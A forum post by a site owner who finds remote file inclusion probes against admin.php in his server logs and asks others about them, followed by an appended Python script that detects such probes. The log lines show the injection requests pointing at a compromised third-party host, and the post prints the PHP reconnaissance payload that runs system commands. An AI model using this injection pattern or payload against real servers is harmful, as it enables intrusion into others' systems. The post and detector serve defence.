Who's attacking the Wolfman?
The Wolfman was reviewing my server logs today when I came across this:
Code:
//admin.php?include_path=http://thermair.co.uk//media/logs/Goid.txt??
Http Code: 404 Date: Jan 02 18:41:25 Http Version: HTTP/1.1 Size in Bytes: -
Referer: - Agent: libwww-perl/5.808
67.15.175.50
/gbook//admin.php?include_path=http://thermair.co.uk//media/logs/Goid.txt??
Http Code: 200 Date: Jan 02 18:44:32 Http Version: HTTP/1.1 Size in Bytes: 4290
Referer: - Agent: libwww-perl/5.808
67.15.175.50
It looks like someone has written a Perl script that is testing my directories for the presence of an admin.php that is vulnerable to a parameter injection attack.
The second attempt actually found my gbook directory which is used by my Ghoulbook. I'm guessing the script spidered my site for admin.php. For all admin.php files discovered, it attempted the injection.
Here is the content of Goid.txt:
Code:
<?
echo "IndoServ<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "IndoServ IRC NetWork<br>";
exit;
?>
It looks like Goid.txt is trying to display information about my server and my user account.
http://thermair.co.uk/ is an Air treatment company in the UK. They are probably unaware that their site is being used to harbour internet attacks against web servers.
A search of the source IP address 67.15.175.50 shows that others have also been attacked.
So here are my questions:
1) Has anyone seen this before?
2) Do you think the Wolfman should notify the Air Treatment company?
Thanks
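
A detection sketch for the pattern in the log entries above, added here as an example and not part of the original post: it flags any request whose query parameter value decodes to a remote URL and records whether the probed script answered with something other than 404. It assumes raw Combined Log Format lines; the sample lines, addresses, hostnames and the function name `find_remote_include_probes` are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Combined Log Format is assumed; the post shows a log viewer's rendering, not raw lines.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)
REMOTE_URL = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges and example hostnames).
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Jan/2008:18:41:25 +0000] "GET //admin.php?include_path='
    'http://files.example.net/probe.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808"',
    '203.0.113.7 - - [02/Jan/2008:18:44:32 +0000] "GET /gbook//admin.php?include_path='
    'http%3A%2F%2Ffiles.example.net/probe.txt?? HTTP/1.1" 200 4290 "-" "libwww-perl/5.808"',
    '198.51.100.20 - - [02/Jan/2008:18:50:01 +0000] "GET /gbook/index.php?page=2 '
    'HTTP/1.1" 200 5120 "http://www.example.org/" "Mozilla/5.0"',
    '198.51.100.21 - - [02/Jan/2008:18:51:10 +0000] "GET /login.php?return=/account '
    'HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]

def find_remote_include_probes(lines):
    """Return one finding per request carrying a remote URL in a query parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a request line in the assumed format
        # Split by hand: a target such as "//admin.php?..." confuses URL parsers,
        # which read the leading "//" as the start of a host name.
        path, _, query = m["target"].partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            # parse_qsl decodes once; decode again to catch double encoding.
            decoded = unquote(value)
            if REMOTE_URL.match(decoded):
                findings.append({
                    "ip": m["ip"], "path": path, "param": name,
                    "remote": decoded.rstrip("?"), "agent": m["agent"],
                    "status": int(m["status"]),
                    "script_exists": m["status"] != "404",
                })
                break  # one finding per request is enough
    return findings

if __name__ == "__main__":
    for finding in find_remote_include_probes(SAMPLE_LOG):
        print(finding)
```

Legitimate redirect or callback parameters that carry full URLs will also match, so review hits by path and status; a non-404 status only shows that the script answered, not that the include succeeded.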